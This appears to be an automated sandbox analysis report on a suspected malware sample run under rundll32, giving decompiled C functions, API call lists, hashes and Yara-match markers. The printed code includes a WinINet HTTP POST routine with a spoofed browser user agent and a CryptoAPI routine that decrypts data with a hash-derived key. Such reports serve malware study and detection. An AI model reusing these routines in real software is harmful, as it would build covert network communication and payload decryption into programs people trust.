                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00001205,028630A4), ref: 027D57B4
                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 027D57D2
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,027D5861,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 027D581B
                          • RegQueryValueExA.ADVAPI32(?,027D59C8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,027D5861,?,80000001), ref: 027D5839
                          • RegCloseKey.ADVAPI32(?,027D5868,00000000,?,?,00000000,027D5861,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 027D585B
                          • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 027D5878
                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 027D5885
                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 027D588B
                          • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 027D58B6
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027D58FD
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027D590D
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027D5935
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027D5945
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 027D596B
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 027D597B
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                          • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                          • API String ID: 1759228003-3917250287
                          • Opcode ID: 25640bfb61e60c37bff90aa815cff198857b5f362b013138893c90794c92ae72
                          • Instruction ID: 0f67cec8d49b540c2a4ab54bb84d2e9b7bffb3f0fdcd79632a81f3667b72261b
                          • Opcode Fuzzy Hash: 25640bfb61e60c37bff90aa815cff198857b5f362b013138893c90794c92ae72
                          • Instruction Fuzzy Hash: C4518771A4025C7FFF22D6A4DC46FEF7BBD9B04744F8401A1A604E6581E7749A44CF60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D28D0 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 188stringnetworkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          C-Code - Quality: 100%
                          			E042D28D0(char* _a4, CHAR* _a8, void* _a12, intOrPtr _a16, DWORD* _a20) {
				void* _v8;
				void* _v12;
				signed short _v16;
				signed int _v20;
				void _v24;
				void _v28;
				void* _v32;
				int _v36;
				long _v40;
				int _v44;
				int _v48;
				long _v52;
				intOrPtr _v64;
				char* _v68;
				signed short _v88;
				intOrPtr _v92;
				char* _v96;
				long _v100;
				void* _v112;
				char _v372;
				char _v632;
				int _t90;
				void* _t145;

				E042D14A0( &_v112, 0, 0x3c);
				_v112 = 0x3c;
				_v96 =  &_v372;
				_v92 = 0x104;
				_v68 =  &_v632;
				_v64 = 0x104;
				_v36 = 0;
				_v44 = lstrlenA("Content-Type: application/x-www-form-urlencoded");
				 *((char*)(_t145 + 0xfffffffffffffe90)) = 0;
				 *((char*)(_t145 + 0xfffffffffffffd8c)) = 0;
				if(_a8 != 0) {
					_v36 = lstrlenA(_a8);
				}
				if(InternetCrackUrlA(_a4, 0, 0,  &_v112) != 0) {
					if(_v100 == 0) {
						_v100 = 3;
					}
					if(_v100 == 3 || _v100 == 4) {
						_v32 = E042D24F0();
						if(_v32 != 0) {
							_v16 = _v88;
							_v20 = 0x84080100;
							if(_v100 == 4) {
								_v20 = _v20 | 0x00803000;
							}
							_v12 = InternetConnectA(_v32,  &_v372, _v16 & 0x0000ffff, 0, 0, 3, 0, 0);
							if(_v12 != 0) {
								_v8 = HttpOpenRequestA(_v12, "POST",  &_v632, 0, 0, 0x42d7048, _v20, 0);
								if(_v8 != 0) {
									if(_v100 == 4) {
										_v40 = 4;
										InternetQueryOptionA(_v8, 0x1f,  &_v24,  &_v40);
										_v24 = _v24 | 0x00001100;
										InternetSetOptionA(_v8, 0x1f,  &_v24, 4);
									}
									_t90 = HttpSendRequestA(_v8, "Content-Type: application/x-www-form-urlencoded", _v44, _a8, _v36); // executed
									_v48 = _t90;
									_v28 = 0;
									if(_v48 == 1) {
										_v52 = 4;
										HttpQueryInfoA(_v8, 0x20000013,  &_v28,  &_v52, 0);
										if(_v28 == 0xc8 && _a12 != 0) {
											if(InternetReadFile(_v8, _a12, _a16 - 1, _a20) == 0 ||  *_a20 <= 0) {
												 *_a20 = 0;
											} else {
												 *((char*)(_a12 +  *_a20)) = 0;
											}
										}
									}
									InternetCloseHandle(_v8);
									InternetCloseHandle(_v12);
									if(_v28 != 0xc8) {
										return 0;
									} else {
										return 1;
									}
								}
								InternetCloseHandle(_v12);
								return 0;
							} else {
								return 0;
							}
						}
						return 0;
					} else {
						return 0;
					}
				}
				return 0;
			}


























                          0x042d28e1
                          0x042d28e9
                          0x042d28f6
                          0x042d28f9
                          0x042d2906
                          0x042d2909
                          0x042d2910
                          0x042d2922
                          0x042d292d
                          0x042d293d
                          0x042d2949
                          0x042d2955
                          0x042d2955
                          0x042d296c
                          0x042d2979
                          0x042d297b
                          0x042d297b
                          0x042d2986
                          0x042d299a
                          0x042d29a1
                          0x042d29ae
                          0x042d29b2
                          0x042d29bd
                          0x042d29c8
                          0x042d29c8
                          0x042d29eb
                          0x042d29f2
                          0x042d2a20
                          0x042d2a27
                          0x042d2a3e
                          0x042d2a40
                          0x042d2a55
                          0x042d2a64
                          0x042d2a73
                          0x042d2a73
                          0x042d2a8e
                          0x042d2a94
                          0x042d2a97
                          0x042d2aa2
                          0x042d2aa4
                          0x042d2abe
                          0x042d2acb
                          0x042d2aee
                          0x042d2b09
                          0x042d2af8
                          0x042d2b00
                          0x042d2b00
                          0x042d2aee
                          0x042d2acb
                          0x042d2b13
                          0x042d2b1d
                          0x042d2b2a
                          0x00000000
                          0x042d2b2c
                          0x00000000
                          0x042d2b2c
                          0x042d2b2a
                          0x042d2a2d
                          0x00000000
                          0x042d29f4
                          0x00000000
                          0x042d29f4
                          0x042d29f2
                          0x00000000
                          0x042d298e
                          0x00000000
                          0x042d298e
                          0x042d2986
                          0x00000000

                          APIs
                          • lstrlenA.KERNEL32(Content-Type: application/x-www-form-urlencoded), ref: 042D291C
                          • lstrlenA.KERNEL32(00000000), ref: 042D294F
                            • Part of subcall function 042D24F0: InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 042D2509
                          • InternetCrackUrlA.WININET(?,00000000,00000000,0000003C), ref: 042D2964
                          • InternetConnectA.WININET(00000000,00000000,00000000,00000000,00000000,00000003,00000000,00000000), ref: 042D29E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$lstrlen$ConnectCrackOpen
                          • String ID: <$Content-Type: application/x-www-form-urlencoded$POST
                          • API String ID: 4167639401-2842678110
                          • Opcode ID: 941c8f2ac8e9037de06bc1e147c2f86eecfd20ff3eb52238c894b9385c63f3b4
                          • Instruction ID: 36ad2352df47b5779daca6d16e45c9a19aca5e78b41ba21401a41b6606ac3a63
                          • Opcode Fuzzy Hash: 941c8f2ac8e9037de06bc1e147c2f86eecfd20ff3eb52238c894b9385c63f3b4
                          • Instruction Fuzzy Hash: 10713D71F1420AEFEB14DFA4D949BEEB7B5FB48701F104558E605AB280D7B4AA44CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027D5868 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98stringlibrarythreadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 147 27d5868-27d5899 lstrcpyn GetThreadLocale GetLocaleInfoA 148 27d589f-27d58a3 147->148 149 27d5982-27d5989 147->149 150 27d58af-27d58c5 lstrlen 148->150 151 27d58a5-27d58a9 148->151 152 27d58c8-27d58cb 150->152 151->149 151->150 153 27d58cd-27d58d5 152->153 154 27d58d7-27d58df 152->154 153->154 155 27d58c7 153->155 154->149 156 27d58e5-27d58ea 154->156 155->152 157 27d58ec-27d5912 lstrcpyn LoadLibraryExA 156->157 158 27d5914-27d5916 156->158 157->158 158->149 159 27d5918-27d591c 158->159 159->149 160 27d591e-27d594e lstrcpyn LoadLibraryExA 159->160 160->149 161 27d5950-27d5980 lstrcpyn LoadLibraryExA 160->161 161->149
                          C-Code - Quality: 61%
                          			E027D5868() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L027D1354();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L027D135C();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L027D1354();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L027D1354();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L027D1354();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











                          0x027d5868
                          0x027d5870
                          0x027d5877
                          0x027d5878
                          0x027d588b
                          0x027d5890
                          0x027d5899
                          0x027d5982
                          0x027d5989
                          0x027d58af
                          0x027d58af
                          0x027d58b5
                          0x027d58b6
                          0x027d58c3
                          0x027d58c8
                          0x027d58cb
                          0x027d58c7
                          0x00000000
                          0x027d58c7
                          0x027d58d7
                          0x027d58df
                          0x027d58e5
                          0x027d58ea
                          0x027d58f7
                          0x027d58fb
                          0x027d58fc
                          0x027d58fd
                          0x027d5912
                          0x027d5912
                          0x027d5916
                          0x027d592f
                          0x027d5933
                          0x027d5934
                          0x027d5935
                          0x027d5945
                          0x027d594a
                          0x027d594e
                          0x027d5950
                          0x027d5965
                          0x027d5969
                          0x027d596a
                          0x027d596b
                          0x027d597b
                          0x027d5980
                          0x027d5980
                          0x027d594e
                          0x027d5916
                          0x00000000
                          0x027d58df

                          APIs
                          • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 027D5878
                          • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 027D5885
                          • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 027D588B
                          • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 027D58B6
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027D58FD
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027D590D
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 027D5935
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 027D5945
                          • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 027D596B
                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 027D597B
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                          • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                          • API String ID: 1599918012-3917250287
                          • Opcode ID: ee0b3db801782ad5bd424a6b12311d7a9b0dc1e7edff4ebd16c0856473e9a791
                          • Instruction ID: c90e3a573f590a5a5b58ac716de1b56f80f9ff08745280ba46523ef42105347d
                          • Opcode Fuzzy Hash: ee0b3db801782ad5bd424a6b12311d7a9b0dc1e7edff4ebd16c0856473e9a791
                          • Instruction Fuzzy Hash: 2A317571E4025C2FFF26D6B89C49FEEBBBD9B04744F8401A19648E6181EB748B848F50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D2CD0 Relevance: 12.1, APIs: 8, Instructions: 91encryptionCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 162 42d2cd0-42d2d10 CryptAcquireContextA 163 42d2d1c-42d2d35 CryptCreateHash 162->163 164 42d2d12 162->164 166 42d2d3b-42d2d51 CryptHashData 163->166 167 42d2d37 163->167 165 42d2da0-42d2da4 164->165 168 42d2db7-42d2dbb 165->168 169 42d2da6-42d2db0 CryptDestroyHash 165->169 170 42d2d57-42d2d74 CryptDeriveKey 166->170 171 42d2d53 166->171 167->165 174 42d2dbd-42d2dc7 CryptDestroyKey 168->174 175 42d2dce-42d2dd2 168->175 169->168 172 42d2d7a-42d2d94 CryptDecrypt 170->172 173 42d2d76 170->173 171->165 176 42d2d9a-42d2d9d 172->176 177 42d2d96 172->177 173->165 174->175 178 42d2dd4-42d2de0 CryptReleaseContext 175->178 179 42d2de7-42d2ded 175->179 176->165 177->165 178->179
                          C-Code - Quality: 37%
                          			E042D2CD0(BYTE* _a4, int _a8, intOrPtr _a12, intOrPtr _a16) {
				int _v8;
				long* _v12;
				long* _v16;
				int _v20;
				intOrPtr _v24;
				int _t32;
				intOrPtr _t33;
				long* _t35;

				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v24 = 0x280011;
				_t32 = CryptAcquireContextA( &_v12, 0, 0, 1, 0xf0000000); // executed
				if(_t32 != 0) {
					__imp__CryptCreateHash(_v12, 0x8004, 0, 0,  &_v8); // executed
					if(_t32 != 0) {
						_t33 = _a16;
						__imp__CryptHashData(_v8, _a12, _t33, 0);
						if(_t33 != 0) {
							_t35 = _v12;
							__imp__CryptDeriveKey(_t35, 0x6801, _v8, _v24,  &_v16); // executed
							if(_t35 != 0) {
								if(CryptDecrypt(_v16, 0, 1, 0, _a4,  &_a8) != 0) {
									_v20 = _a8;
								}
							}
						}
					}
				}
				if(_v8 != 0) {
					__imp__CryptDestroyHash(_v8);
					_v8 = 0;
				}
				if(_v16 != 0) {
					CryptDestroyKey(_v16);
					_v16 = 0;
				}
				if(_v12 != 0) {
					CryptReleaseContext(_v12, 0);
					_v12 = 0;
				}
				return _v20;
			}











                          0x042d2cd6
                          0x042d2cdd
                          0x042d2ce4
                          0x042d2ceb
                          0x042d2cf2
                          0x042d2d08
                          0x042d2d10
                          0x042d2d2d
                          0x042d2d35
                          0x042d2d3d
                          0x042d2d49
                          0x042d2d51
                          0x042d2d68
                          0x042d2d6c
                          0x042d2d74
                          0x042d2d94
                          0x042d2d9d
                          0x042d2d9d
                          0x042d2d94
                          0x042d2d74
                          0x042d2d51
                          0x042d2d35
                          0x042d2da4
                          0x042d2daa
                          0x042d2db0
                          0x042d2db0
                          0x042d2dbb
                          0x042d2dc1
                          0x042d2dc7
                          0x042d2dc7
                          0x042d2dd2
                          0x042d2dda
                          0x042d2de0
                          0x042d2de0
                          0x042d2ded

                          APIs
                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 042D2D08
                          • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,00000000), ref: 042D2D2D
                          • CryptDestroyHash.ADVAPI32(00000000), ref: 042D2DAA
                          • CryptDestroyKey.ADVAPI32(00000000), ref: 042D2DC1
                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 042D2DDA
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$ContextDestroyHash$AcquireCreateRelease
                          • String ID:
                          • API String ID: 1222261195-0
                          • Opcode ID: 3b176810597fb111ddbdda3b1ccfa4e3b3a52cc651427987c4f5fccc1c83d6ed
                          • Instruction ID: cc4222ed9ade1ff7877b80f54384cb948d92da447b7842571582602861a39991
                          • Opcode Fuzzy Hash: 3b176810597fb111ddbdda3b1ccfa4e3b3a52cc651427987c4f5fccc1c83d6ed
                          • Instruction Fuzzy Hash: 2331FC75B24209FBEB14DFA4D888FAE7778EB44705F108588F602E72C0D7B4AA44DB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027EE2C0 Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                          Download Yara Rule
                          C-Code - Quality: 82%
                          			E027EE2C0(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t12;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t12 = FindResourceA(__edx, _v8, _a4); // executed
				_t29 = _t12;
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E027EE250(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x27ee364
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E027EE250(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x27ee364
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x27ee028
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E027EDFE8(_t23, _t25, _t18);
			}


















                          0x027ee2c7
                          0x027ee2ca
                          0x027ee2cc
                          0x027ee2d7
                          0x027ee2dc
                          0x027ee2de
                          0x027ee2e1
                          0x027ee2e3
                          0x027ee2e6
                          0x027ee2eb
                          0x027ee2eb
                          0x027ee2ec
                          0x027ee2f6
                          0x027ee2f8
                          0x027ee2fb
                          0x027ee2fd
                          0x027ee300
                          0x027ee305
                          0x027ee306
                          0x027ee310
                          0x027ee311
                          0x027ee315
                          0x027ee31e
                          0x027ee329

                          APIs
                          • FindResourceA.KERNEL32(027D0000,?,?), ref: 027EE2D7
                          • LoadResource.KERNEL32(027D0000,027EE364,027E93B4,027D0000,00000001,00000000,?,027EE230,?,?,?,?,?,028615EE,00001205,gyy), ref: 027EE2F1
                          • SizeofResource.KERNEL32(027D0000,027EE364,027D0000,027EE364,027E93B4,027D0000,00000001,00000000,?,027EE230,?,?,?,?,?,028615EE), ref: 027EE30B
                          • LockResource.KERNEL32(027EE028,00000000,027D0000,027EE364,027D0000,027EE364,027E93B4,027D0000,00000001,00000000,?,027EE230,?), ref: 027EE315
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Resource$FindLoadLockSizeof
                          • String ID:
                          • API String ID: 3473537107-0
                          • Opcode ID: e3a2fa9fad375ce376390504dce4b2d6cef3f876944964df5bcf140a0d2a8879
                          • Instruction ID: 74baa773f776e55ab0c540c21821a0aedd98e7a566047d6fe38e9010b583850f
                          • Opcode Fuzzy Hash: e3a2fa9fad375ce376390504dce4b2d6cef3f876944964df5bcf140a0d2a8879
                          • Instruction Fuzzy Hash: 2BF06DB26046146F8B06EE5CA884D5B77EDDE8C360310041AF909CB205DA31DD014B79
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 042D1390 Relevance: 3.0, APIs: 2, Instructions: 18memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E042D1390(long _a4) {
				void* _t4;
				void* _t6;

				if( *0x42d715c == 0) {
					 *0x42d715c = GetProcessHeap();
				}
				if( *0x42d715c == 0) {
					return 0;
				} else {
					_t6 =  *0x42d715c; // 0x28f0000
					_t4 = RtlAllocateHeap(_t6, 0, _a4); // executed
					return _t4;
				}
			}





                          0x042d139a
                          0x042d13a2
                          0x042d13a2
                          0x042d13ae
                          0x00000000
                          0x042d13b0
                          0x042d13b6
                          0x042d13bd
                          0x00000000
                          0x042d13bd

                          APIs
                          • GetProcessHeap.KERNEL32(?,042D1886,00100000), ref: 042D139C
                          • RtlAllocateHeap.NTDLL(028F0000,00000000,042D1886,?,042D1886,00100000), ref: 042D13BD
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID:
                          • API String ID: 1357844191-0
                          • Opcode ID: 8b4091c45b4089addaeb77c5d54dbe2df424a5e1fe7f59ff2bce68f53cacdcf1
                          • Instruction ID: e632a1f0eca4c6406643e49ba3b8527dbe4cf25c6346c6f639b489aa4966364a
                          • Opcode Fuzzy Hash: 8b4091c45b4089addaeb77c5d54dbe2df424a5e1fe7f59ff2bce68f53cacdcf1
                          • Instruction Fuzzy Hash: CDE0B630B16245DBD3489EA9F80C72577B8E349205F404516A50987A80D67DE890CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02838ED0 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E02838ED0(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x2838f56);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x2865b9c =  *0x2865b9c - 1;
				if( *0x2865b9c < 0) {
					 *0x2865b98 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x2865b98;
					E02838C80(_t16, __edi,  *0x2865b98);
					_t6 =  *0x28290fc; // 0x2829148
					E027EA814(_t6, _t16, _t17,  *0x2865b98);
					_t8 =  *0x28290fc; // 0x2829148
					E027EA8B4(_t8, _t16, _t17, _t31);
					_t21 =  *0x28290fc; // 0x2829148
					_t10 =  *0x281fefc; // 0x281ff48
					E027EA860(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x28290fc; // 0x2829148
					_t12 =  *0x280fa10; // 0x280fa5c
					E027EA860(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x28290fc; // 0x2829148
					_t14 =  *0x280fbcc; // 0x280fc18
					E027EA860(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x2838f5d);
				return 0;
			}















                          0x02838ed0
                          0x02838ed0
                          0x02838ed5
                          0x02838ed6
                          0x02838edb
                          0x02838ede
                          0x02838ee1
                          0x02838ee8
                          0x02838ef8
                          0x02838ef8
                          0x02838eff
                          0x02838f04
                          0x02838f09
                          0x02838f0e
                          0x02838f13
                          0x02838f18
                          0x02838f1e
                          0x02838f23
                          0x02838f28
                          0x02838f2e
                          0x02838f33
                          0x02838f38
                          0x02838f3e
                          0x02838f43
                          0x02838f43
                          0x02838f4a
                          0x02838f4d
                          0x02838f50
                          0x02838f55

                          APIs
                          • GetVersion.KERNEL32(00000000,02838F56), ref: 02838EEA
                            • Part of subcall function 02838C80: GetCurrentProcessId.KERNEL32(?,00000000,02838DF8), ref: 02838CA1
                            • Part of subcall function 02838C80: GlobalAddAtomA.KERNEL32(00000000), ref: 02838CD4
                            • Part of subcall function 02838C80: GetCurrentThreadId.KERNEL32 ref: 02838CEF
                            • Part of subcall function 02838C80: GlobalAddAtomA.KERNEL32(00000000), ref: 02838D25
                            • Part of subcall function 02838C80: RegisterClipboardFormatA.USER32(00000000), ref: 02838D3B
                            • Part of subcall function 02838C80: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,?,00000000,02838DF8), ref: 02838DBF
                            • Part of subcall function 02838C80: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 02838DD0
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
